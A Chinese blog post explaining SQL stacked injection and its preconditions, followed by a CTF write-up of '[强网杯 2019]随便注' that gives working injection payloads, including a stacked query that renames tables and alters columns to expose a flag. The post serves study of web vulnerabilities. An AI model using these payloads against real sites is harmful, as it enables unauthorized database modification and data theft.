sql-堆叠注入

最新推荐文章于 2024-04-09 16:45:23 发布
最新推荐文章于 2024-04-09 16:45:23 发布
阅读量508 收藏 5
点赞数 1
文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhhhb1005/article/details/126310488
版权

前几星期写题时遇见了好几道关于堆叠注入的题目,结果发现我对堆叠注入不是特别了解,所以写一下博客记录一下,但是发现堆叠注入使用的场景和条件好像有点苛刻。

目录

堆叠注入原理

堆叠注入触发条件

实例

[强网杯 2019]随便注

堆叠注入原理

堆叠注入,顾名思义,就是将语句堆叠在一起进行查询
原理很简单,mysql_multi_query() 支持多条sql语句同时执行,就是个;分隔,成堆的执行sql语句,例如

 select * from users;show databases;

就同时执行以上两条命令,所以我们可以增删改查,只要权限够。
虽然这个注入姿势很牛逼,但实际遇到很少,其可能受到API或者数据库引擎,又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用,利用mysqli_multi_query()函数就支持多条sql语句同时执行,但实际情况中,如PHP为了防止sql注入机制,往往使用调用数据库的函数是mysqli_ query()函数,其只能执行一条语句,分号后面的内容将不会被执行,所以可以说堆叠注入的使用条件十分有限,一旦能够被使用,将可能对网站造成十分大的威胁。

堆叠注入触发条件

堆叠注入触发的条件很苛刻,因为堆叠注入原理就是通过结束符同时执行多条sql语句,这就需要服务器在访问数据端时使用的是可同时执行多条sql语句的方法,例如php中的mysqli_multi_query函数。但与之相对应的mysqli_query()函数一次只能执行一条sql语句,所以要想目标存在堆叠注入,在目标主机没有对堆叠注入进行黑名单过滤的情况下必须存在类似于mysqli_multi_query()这样的函数,简单总结下来就是

1、目标存在sql注入漏洞
2、目标未对";"号进行过滤
3、目标中间层查询数据库信息时可同时执行多条sql语句

实例

[强网杯 2019]随便注

输入1,页面返回正常;
输入1’ 页面报错了,加上注释符号#页面又回显正常,那么闭合符号就是单引号

然后进行正常的操作。

判断列数:

1' order by 2#   //回显正常
1' order by 3#   //回显报错

 

 联合查询:

1' union select 1,2#

发现过滤了很多函数。

尝试堆叠注入:

1'; show databases;#

 

查表名:

1'; show tables;#

 

查询这两个表名中的列:

注意:这里查询表名使用反单引号,在windows系统下,反单引号(`)是数据库、表、索引、列和别名用的引用符。

-1'; show columns from 'words';#
-1'; show columns from `1919810931114514`;#

 在表1919810931114514中发现flag

 虽然我们已经找到了flag了,但是select被过滤了,而show命令又不能查看值。这就比较头疼了,不过如果仔细观察的话,一开始过滤的并没有alert 和 rename,我们已经知道了words是用来回显内容的,所以思路就是:我们把1919810931114514这个表更改名字为words,并增加相应的字段,使之回显原1919810931114514这个表的内容里面。

  1. 将words的表名改成其它名字
  2. 将1919810931114514表名改成"words"
  3. 将flag列名改成id或者data
  4. 在将这个新的words表插入一个列,即id或者data

这里就要考验到我们对sql数据库的增删查改的能力了,当然我也不会,所以去网上搜一下。 

rename: 修改名字
使用方法:rename table(修改的类型) tableA(待修改的表等) to tableB(重命名后的名字)
alter:队列进行操作
使用方法:alter table table[表名] add column[列名] type[数据类型] //(添加列)
		alter table table[表名] change columnA[原列名] column[修改后列名] type[数据类型] //改变列名1
		alter table table[表名] rename columnA[原列名] column[修改后列名]  //改变列名2,(不改变数据类型)
		alter table table[表名] alter column column[列名] type[修改后的数据类型] //修改列的数据类型
		alter table table[表名] drop column[列名] type[数据类型]  //删除表中的某一列
		SQL限制条件:
        alter table table[表名] modify column[列名] int not null  //是某一列不能存储null的字段
        alter table table[表名] modify column[列名] int null     //解除对not null的限制
        alter table table[表名] add column[列名] primary key (id) 
        //- NOT NULL 和 UNIQUE 的结合。指定主键,确保某列(或多个列的结合)有唯一标识,每个表有且只有一个主键。
        alter table table[表名] add unique (id);
        //增加unique约束。保证某列的每行必须有唯一的值。(注:可以有多个 UNIQUE 约束,只能有一个 PRIMARY KEY 约束)
        alter table table[表名] add check (限制条件); //限制列的值得范围
        alter table table[表名] alter column[列名] set default '默认值' //设置默认值,即未给列赋值时的默认值
		alter table table[表名] add constraint ab_c default '默认值' for column[列名] //
		alter table table[表名] add column[列名] auto_increment    //自动赋值,默认从1开始
		alter table table[表名] add column[列名] foreign key //保证一个表中的数据匹配另一个表中的值的参照完整性

构造出payload如下:

1';RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) ;show columns from words;#
  • rename table words to word1; //将words表名更改为word1
  • rename table1919810931114514to words;//将1919810931114514表名改为words
  • alter table words change flag id varchar(100); //将words表中的flag列改成数据类型为char(100)名字为data的新列

 

 

S@Kura
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
【sql注入-堆注入】多语句执行、结合其他注入
07-12 4666
【堆注入】相比其他注入能执行的操作更多
注入([强网杯 2019]随便注1)
热门推荐
Battery的博客
10-13 9万+
注入(Stack Injection)是一种计算机安全概念,涉及攻击者向程序的堆栈内存中插入恶意代码,以便在程序执行期间执行非预期的操作。堆栈注入攻击通常利用程序在处理函数调用时使用的堆栈机制。当一个函数被调用时,程序将在堆栈中为其分配内存以保存局部变量和返回地址。攻击者可以找到并修改这些堆栈中的值,将恶意代码插入到程序的执行流程中。堆注入攻击通常需要攻击者对目标程序的运行环境和代码结构有一定的了解。攻击者可能需要了解目标程序的输入格式、函数调用方式和内存管理机制等方面的知识。
SQL注入——堆注入
nobugnomoney的博客
05-19 3184
一、堆注入的原理 1、介绍 在 SQL 中,分号(;)是用来表示一条 sql 语句的结束。试想一下我们在 ; 结束一个 sql 语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆注入。而 union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于 union 或者 union all 执行的语句类型是有限的,可以用来执行查询语句,而堆注入可以执行的是 任意的语句。 例如下面这个例子: 用户输入: 1; DELETE FROM products
SQL注入原理-堆注入
T1ngSh0w的博客
09-18 1205
SQL注入原理-堆注入 分为基于mysqli数据对象的注入和PDO数据对象的堆注入
sqli-labs通关全解----堆注入---38~45---11
cyynid的博客
01-13 455
本文引入一个新的概念:堆注入Stackedinjections:堆注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加;表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在;结束一个sql 语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆注入
SQL 注入天书.pdf
08-06
随着挑战难度的提升,学习者将接触到更复杂的注入技术,如联合查询注入、堆查询注入、 outfile 和 load_file 函数的使用等。此外,还将学习如何防御SQL注入,例如使用参数化查询、预编译语句和输入验证等方法。 ...
第18天:WEB漏洞-SQL注入之堆及WAF绕过注入1
08-03
注入(Stacked Injections)是 SQL 注入的一种特殊形式,即在一个 SQL 语句中执行多个语句。 在 MySQL 中,每个语句结尾加;表示语句结束。因此,我们可以将多个语句结合起来,形成一个堆注入。例如: id=-1...
SQL注入天书 sqli-labs
01-11
5. **堆查询注入**:通过构造多条查询语句并用分号分隔,一次性执行多个查询。 6. **信息收集**:学习如何获取数据库版本、表名、列名等敏感信息,为后续攻击铺平道路。 7. **OS命令注入**:在某些情况下,SQL...
SQL-Injection-cheat-sheet:利用和学习SQL注入的备忘单
02-06
- **堆查询**:在单个查询中注入多个SQL语句。 - **二次查询**:利用已存储的结果(如session)作为新查询的一部分。 3. **常见注入技巧**: - **字符转义**:使用反斜杠(\)对特殊字符进行转义。 - **注释...
sql-bypass靶场
03-19
6. **堆查询(Stacked Queries)**:堆查询是将多个查询语句放在一个请求中,通过分隔符(如";")进行分割。不过,很多现代的数据库系统已经对此进行了防护。 7. **存储过程(Stored Procedures)**:在某些...
注入
qq_63527808的博客
04-12 68
注入是当 php 连接 mysql 进行查询时,若查询语句使用的是 mysqli_multi_query() 而不是 mysqli_query()时,就会存在堆注入;区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆注入可以执行的是任意的语句;而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?作分隔,然后同时执行多个语句;
15-SQL堆注入
qq_56414082的博客
03-29 1681
参考资料;sqlmap中存放绕过waf的一些脚本小插件在tamper文件夹中创建rdog.py,在tamper中找个文件打开,复制脚本修改""""""import repass(*/)')(*/)')//--proxy是代理,和bg抓包IP一致可以看到的是代码并没有按照我们预期执行,我们添加代理看看到底是个什么情况可以看到user-agent是,安全软件当中是禁止使用这种脚本客户端所以就被拦截,自然插件脚本也就没办法正常执行解决思路:通过抓包对比分析。
简单了解SQL堆注入与二次注入(基于sqllabs演示)
Welcome To Myon'Blog !
12-29 814
由于后面关于核对admin密码的信息也被注释掉了,即没有进行校验,从而误认为是admin在进行密码修改。在这个过程中,我们正常创建新用户其实是没有任何问题的,问题出在修改密码,此时查询的本该是用户。指已存储(数据库、文件)的用户的输入被读取后再次进入到 SQL 查询语句中导致的注入。在我们的数据库里有一个用户名为admin,密码为admin的用户。闭合了前面,并且将后面的信息进行了注释,导致查到的用户名为。接下来我们使用堆注入对id为2的用户的密码进行修改。注意我们现在的身份是admin'#
sql注入之堆和二次注入
最新发布
weixin_45653478的博客
04-09 483
二次注入:二次注入是存储型注入,可以理解为构造恶意数据存储在数据库后,恶意数据被读取并进入到了SQL查询语句所导致的注入。恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中,当Web程序调用存储在数据库中的恶意数据并执行SQL查询时,就发生了SQL二次注入。简言之就是将脏数据进行简单过滤后开发者就认为该数据可信便存入数据库中,当下一次调用该数据时,该数据就会拼接到其他查询语句中造成注入。这时候我们就是在进行越权改变管理员的密码,从数据库中抽出我们注册的新账户,用该账户越权修改管理员的密码。
mysql的query开发,通过mysql_query进行SQL注入
weixin_39716417的博客
02-05 316
I'm working on a site that has been hacked through SQL Injection (at first glance only db entries are corrupted with cross-site scripting) the potential vulnerability I found after looking at the code...
mysql堆注入条件_堆注入详解
weixin_39943383的博客
02-10 998
0x00 堆注入定义Stacked injections(堆注入)从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在 mysql 中, 主要是命令行中,每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked injection。0x01 堆注入原理在SQL中,分号(;)是用来表示一条sql语句的结束。...
mysql multi_query_PHP mysqli_multi_query() 函数
weixin_36205101的博客
01-27 108
实例执行多个针对数据库的查询:$con=mysqli_connect("localhost","my_user","my_password","my_db");// Check connectionif (mysqli_connect_errno($con)){echo "Failed to connect to MySQL: " . mysqli_connect_error();}$sql = ...
SQL注入之堆注入
Jim的博客
08-13 2926
less-50 源码:$sql="select * from users order by $id"; if (mysqli_multi_query($con1,$sql))  //mysqli_multi_query()可以执行多个sql语句,而mysqli_query()只能执行一个sql语句 注入:?sort=1;create table jack like users# less-
BUU的SUCTF 2019 Easysql
小白渣的博客
02-05 3461
呜呜呜~~ ~自己已经好久好久都没有做题和更新博客辽 加上这次的疫情,感jio整个人都要躺发霉辽!!! 下午闲着没事终于开始了做题 打开题目发现是这样的一个页面 第一步还是老样子 先看看源码是什么样子的 应该是发现不了什么东西 我们发现是post 方法传参 我们可以发现 1;show databases; #查库 1;show tables; #查表 可以发现只有一个Flag...
sqlmap 堆注入
08-17
注入是一种利用数据库查询语句的漏洞进行攻击的技术。SQLMap是一个常用的自动化SQL注入工具,它可以用来检测和利用堆注入漏洞。 堆注入是通过将多个SQL语句连接在一起执行,从而绕过输入过滤和参数绑定等安全机制。攻击者可以通过构造恶意的输入来执行任意的SQL语句,例如插入、更新或删除数据,甚至执行系统命令。 使用SQLMap可以自动化地检测和利用堆注入漏洞。它具有强大的功能,可以自动发现目标网站的注入点,并进行注入测试。你可以通过指定目标URL、注入类型和其他参数来配置SQLMap的运行。 然而,请注意,堆注入是一种非常危险的漏洞攻击技术,对于未经授权的测试或攻击是违法的。在进行任何安全测试之前,请确保已经获得了合法的授权,并且仅在合法的测试环境中进行。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值